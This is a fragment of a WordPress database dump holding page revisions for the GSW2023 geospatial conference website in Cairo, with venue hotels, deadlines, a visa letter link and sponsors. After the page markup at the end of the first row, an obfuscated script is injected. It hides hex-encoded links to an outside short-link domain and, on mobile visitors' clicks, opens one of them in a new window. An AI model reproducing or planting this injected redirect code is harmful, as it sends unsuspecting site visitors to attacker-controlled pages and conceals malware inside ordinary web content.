size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1685736118080{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]Read More[/dt_default_button][/vc_column][vc_column width=\"3/4\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][dt_team_masonry order=\"asc\" custom_content_bg_color=\"#e8e8e8\" image_sizing=\"proportional\" img_max_width=\"120px\" image_paddings=\"10px 0px 0px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"105\" css_dt_team_masonry=\".vc_custom_1686350035719{margin-top: 190px !important;}\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" bg_image_new=\"id^3283|url^https://gsw2023.com/wp-content/uploads/2022/11/1664433062169.jpg|caption^null|alt^null|title^1664433062169|description^null\" animation_direction=\"top-animation\" bg_override=\"full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"#686868\"][vc_column width=\"1/2\"][vc_column_text css=\".vc_custom_1684379817578{margin-left: -50px !important;border-left-width: -50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffff00; font-size: 24pt;\">InterContinental Cairo Semiramis</span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\"><img class=\" wp-image-3289 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2022/11/282192719-300x169.jpg\" alt=\"\" width=\"328\" height=\"185\" />Conference Venue </span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Special Rate Booking is Opened Now</span></h4>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.ihg.com%2Fintercontinental%2Fhotels%2Fus%2Fen%2Fcairo%2Fcroha%2Fhoteldetail%3FfromRedirect%3Dtrue%26qSrt%3DsAV%26qIta%3D99801505%26icdv%3D99801505%26qSlH%3DCROHA%26qGrpCd%3DDY8%26setPMCookies%3Dtrue%26qSHBrC%3DIC%26qDest%3DCorniche%2BEl%2BNil%25252C%2BCairo%25252C%2BEG%26srb_u%3D1|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1684379884193{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column width=\"1/2\" awb_type=\"image\"][vc_column_text]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #ffff00;\">Ramses Hilton hotel</span></h4>\n<h4></h4>\n<p><img class=\"aligncenter\" src=\"https://www.hilton.com/im/en/CAIRHTW/16763081/exterior-night-shot.jpg?impolicy=crop&amp;cw=4849&amp;ch=3334&amp;gravity=NorthWest&amp;xposition=75&amp;yposition=0&amp;rw=320&amp;rh=220\" alt=\"Hotel Exterior at Night\" width=\"262\" height=\"180\" /></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.hilton.com%2Fen%2Fattend-my-event%2Fcairhtw-gaas23-e979b836-791b-44ea-9095-410655c177d0%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1684378842229{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_inner width=\"1/4\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1668204801057{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][/vc_column_inner][vc_column_inner width=\"3/4\" css=\".vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][/vc_column_inner][/vc_row_inner][/vc_column][vc_column][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row content_placement=\"middle\" bg_type=\"image\" parallax_style=\"vcpb-default\" bg_image_new=\"id^3365|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-1-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" bg_image_posiiton=\"0\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.58)\"][vc_column width=\"1/2\" css=\".vc_custom_1686320668385{margin-top: -25px !important;}\"][ultimate_heading main_heading=\"Important Dates\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-top:20px;margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\" margin_design_tab_text=\"\"]&nbsp;</p>\n<ul>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Camera ready paper submission: July 15, 2023 </strong></span></h5>\n</li>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Deadline for submission of travel grants funded by The ISPRS Foundation is: June 16, 2023</strong></span></h5>\n</li>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Early bird registration deadline: July 1, 2023</strong></span></h5>\n</li>\n</ul>\n<p>[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"][/ultimate_heading][/vc_column][vc_column width=\"1/2\"][ultimate_heading main_heading=\"Invitation Letter\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<h2 style=\"text-align: center;\"></h2>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>You can generate an invitation letter automatically once you provide your information.</strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span><strong><span style=\"color: #ffff00;\"><a style=\"color: #ffff00;\" href=\"https://visa.gsw2023.com/\">Get Your Invitation letter</a></span></strong></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>If you require specific format for the Visa Letter, please Send email with the additional information to</strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffff00;\"><strong> </strong><a style=\"color: #ffff00;\" href=\"mailto:GSW-visa@gsw2023.com\">GSW-visa@gsw2023.com</a><strong> .</strong></span></h5>\n<p>[/ultimate_heading][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][vc_column_text]</p>\n<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Keynotes Speakers and Panelists</strong></span></h3>\n<p>[/vc_column_text][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"180px\" image_paddings=\"10px 10px 10px 10px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"104\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\n<p><span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span></p>\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]</p>\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-06-13 22:40:08','2023-06-13 22:40:08','',3066,'https://gsw2023.com/?p=4690',0,'revision','',0),
(4691,1,'2023-06-13 22:40:31','2023-06-13 22:40:31','<p>[vc_row css=\".vc_custom_1680403823446{margin-top: -35px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1685609158984{margin-top: 100px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 36pt;\">Prime Sponsor</span></h4>\n<p>&nbsp;</p>\n<p><a href=\"https://www.gasgi.gov.sa\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4592\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/شعار-الهيئة-العامة-للمساحه-والمعلومات-الجيومكانية-بالمملكة-العربية-السعودية-2-300x110.jpg\" alt=\"\" width=\"447\" height=\"164\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1685609109195{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Platinum Sponsors</strong></span></h4>\n<p><a href=\"https://www.pix4d.com/ \"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406603694{margin-top: 125px !important;}\"]</p>\n<h6><a href=\"https://www.bdstar.com/en/\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406565735{margin-top: 50px !important;}\"]</p>\n<h3 style=\"text-align: center;\"><strong>Gold 